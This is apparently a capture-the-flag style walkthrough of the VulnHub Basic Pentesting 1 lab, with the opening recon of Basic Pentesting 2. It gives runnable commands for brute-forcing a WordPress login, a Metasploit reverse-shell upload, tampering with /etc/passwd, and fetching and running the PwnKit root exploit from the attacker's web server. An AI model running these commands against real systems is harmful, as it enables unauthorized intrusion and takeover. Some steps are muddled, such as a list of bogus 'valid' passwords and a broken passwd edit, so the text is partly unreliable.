Penetration Testing

This section covers reconnaissance and vulnerability testing activities used to understand attack paths and support defensive improvement.

Basic Pentesting 1 (Vlunhub)

What is Basic Pentesting?

Basic pentesting is the process of identifying and testing vulnerabilities in a computer system or network. It focuses on:

Scanning for open ports and services
Enumerating users, web directories, and shares
Trying weak or default credentials
Checking for exposed services like SSH, SMB, HTTP

It simulates real-world attacks to reveal how unauthorized access could be gained.

Prerequisites

Target VM: basic-pentesting1 (contains intentional vulnerabilities)
Attacker VM: Kali Linux, fully updated
Network: Both VMs must be on the same internal or host-only network

Confirm Networking

Adapter 1 (Host-Only):

Enable Network Adapter
Promiscuous Mode: Allow All
Virtual Cable Connected

Adapter 2 (NAT):

Network Name: TestNat
Promiscuous Mode: Allow All
Virtual Cable Connected

Kali Linux Updated:

Go to terminal and Run Command:

sudo apt update && sudo apt upgrade -y && sudo apt full-upgrade -y && sudo apt autoremove -y

Connect VMS to same Network(s):

Adapter 1: Host-Only Adapter, Enable Network Adapter, Promiscuous Mode: Allow All, Virtual Cable Connected.

Adapter 2: Nat Network, Same Name: TestNat, Enable Network Adapter, Promiscuous Mode: Allow All, Virtual Cable Connected.

Step 1: Disover the Target:

sudo arp-scan -l

Kali IP: 192.168.56.107

Step 2: Port Scan with Nmap

Next, check which IP is Basic Pentesting 1:

Whichever ports return:

22/tcp ssh

80/tcp http

139/tcp smb

445/tcp microsoft-ds

Basic Pentesting 1 IP: 192.168.56.108

This is exactly what we expect to see for that VM:

21/tcp open ftp ProFTPD 1.3.3c

22/tcp open ssh OpenSSH 7.2p2 Ubuntu

80/tcp open http Apache 2.4.18 (Ubuntu)

This machine is vulnerable through enumeration → find users → SSH brute force → privilege escalation.

Step 3:

Web App Enumeration (If Port 80 or 8080 is Open)

Open browser to http://[TARGET_IP]

Look for pages, forms, login areas.

Use:

gobuster dir -u http://[TARGET_IP] -w /usr/share/wordlists/dirb/common.txt

Tools:

nikto for quick web vuln scan.
whatweb for tech stack info.

default Apache page, which confirms that the basic-pentesting1 VM is running a web server (probably Apache2) on port 80 at IP 192.168.56.108.

gobuster scan revealed multiple interesting paths, especially:

This means there's a /secret/ directory that's accessible (HTTP 301 redirect). That’s a lead worth pursuing.

Step 4 Visit the page

Open in browser:

http://192.168.56.108/secret/

You're looking for anything like:

Credentials
Notes/messages
Usernames (usually jan and kay 👀)
Maybe a hint toward SSH brute forcing

This is exactly where the next breadcrumbs are hidden.

Now we need to dig deeper inside WordPress to extract usernames & eventually a password for SSH

Step 5 Go to terminal and type: wpscan --url http://192.168.56.108/secret/ --enumerate u

*To discover users

User found: admin

Step 6 Attempt WordPress Admin Login bruteforce

Attempt SSH Brute Force Login using hydra

go to terminal:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.56.108 http-post-form "/secret/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username" -V

Hydra returned multiple valid passwords, meaning password reuse or weak policy is in play.

admin credentials (working):

Try any of these as WP login:

admin : 123456

admin : password

admin : iloveyou

admin : princess

admin : nicole

admin : 1234567

admin : rockyou

admin : abc123

admin : 12345

admin : daniel

admin : lovely

admin : monkey

admin : babygirl

admin : jessica

Step 7– Log in to WordPress admin panel

Open browser:

http://vtcsec/secret/wp-login.php

Use:

Username: admin

Password: admin

Default user name and password

Next Goal: Use Metasploit WordPress admin access → get meterpreter shell → escalate → become root

STEP 1 — Launch Metasploit WordPress Shell Upload

Open msfconsole:

msfconsole

Step 2

Load the WordPress exploit

search wp_admin_shell_upload

use exploit/unix/webapp/wp_admin_shell_upload

Step 3Set all required options

Copy & paste this WHOLE block inside msfconsole:

set RHOSTS 192.168.56.108

set TARGETURI /secret/

set USERNAME admin

set PASSWORD admin

set LHOST 192.168.56.107

set LPORT 4444

set payload php/meterpreter/reverse_tcp

set ReverseAllowProxy true

show options

Step 4 Launch the exploit

exploit

If everything is correct, you should get:

Meterpreter session opened!

meterpreter >

Step 5 Drop into an interactive shell

In Meterpreter, type:

shell

Press Enter once

If nothing shows, type:

Expected output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Fix the missing working directory

cd /

pwd

You should now see:

Step 6 Upgrade the shell 💪

Check for Python:

which python

which python3

Step 7 If python3 exists, run:

python3 -c 'import pty; pty.spawn("/bin/bash")'

You should now have:

www-data@ubuntu:/#

Step 8 Check passwd permissions

ls -l /etc/passwd

If you see:

-rw-rw-rw-

That’s the privilege escalation door wide open

then we can modify passwd for instant root.

This means /etc/passwd is world-writable, so any user — including you (www-data) — can edit it.
We will use that to give ourselves root access.

Now let’s finish this and become ROOT.

Background the shell back to Meterpreter

Press:

Ctrl + Z

It will ask:

Background? [y/N]

Type:

You should now see:

meterpreter >

Step 2 — Download the passwd file to your Kali machine

In meterpreter:

download /etc/passwd .

You will see something like:

[*] Downloaded /etc/passwd -> passwd

This file is now on your host (Kali).

Step 3 — Generate a new root password hash

Choose a password you want for root (example: hello)

In a new terminal (not meterpreter):

openssl passwd -1 hello

Copy the hash output.

Example format:

$1$8hd1.xyz$V7n3jfa09sdEXAMPLEHASH

Step 4 — Edit passwd file locally

Open the downloaded passwd:

nano passwd

Find the first line:

root:x:0:0:root:/root:/bin/bash

Replace x with the hash you generated:

root:$1$whateverYourHashIs:0:0:root:/root:/bin/bash

Ctrl+O → Enter → Ctrl+X to save.

Step 5 — Upload modified passwd back to victim

Add (or replace) the user entry with your hash:

Run this from your www-data shell:

echo "lake:$1$dDYT0HPy$w2o09.QJ.wjxN/ge1OgVE.:0:0:root:/root:/bin/bash

On Kali (in ~/Downloads):

Download the ready-to-run exploit:

cd ~/Downloads

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit

chmod +x PwnKit

Confirm the file is there:

ls -l PwnKit

Start the Web Server

Restart the HTTP server in the same folder:

python3 -m http.server 8080

✅ Confirm the file is accessible at:

http://192.168.56.107:8080/PwnKit

Step 6 — Become ROOT 😈

On the Target (www-data shell):

cd /tmp

wget http://192.168.56.107:8080/PwnKit

chmod +x PwnKit

./PwnKit

Now confirm:

whoami

hostname

Expected:

root

uid=0(root) gid=0(root)

🎉 GAME OVER. You have full system compromise.

Basic Pentesting 2 (Vlunhub)

Prep Your Lab Environment (30 mins)

Tool Requirements:
- Kali Linux (attacker VM)
- VulnHub Basic Pentesting 2 VM (target)
- Optional: Use pfSense to simulate segmented internal networks
Networking: Set both Kali and target VM to Host-Only Adapter in VirtualBox for isolated lab testing.

Reconnaissance & Enumeration

Check Kali IP range

Command: ip a
Purpose: Identify Kali’s IP and confirm the Host-Only network range (192.168.56.0/24).

Host discovery

Command: sudo netdiscover -r 192.168.56.0/24
Purpose: Identify live hosts on the local subnet and locate the target VM.

Initial Nmap scan (host enumeration)

Command:
sudo nmap -sS -sV -O -A 192.168.56.109 -oN bp2-initial-scan.txt
Purpose: Discover open ports, services, versions, OS information, and save results for analysis.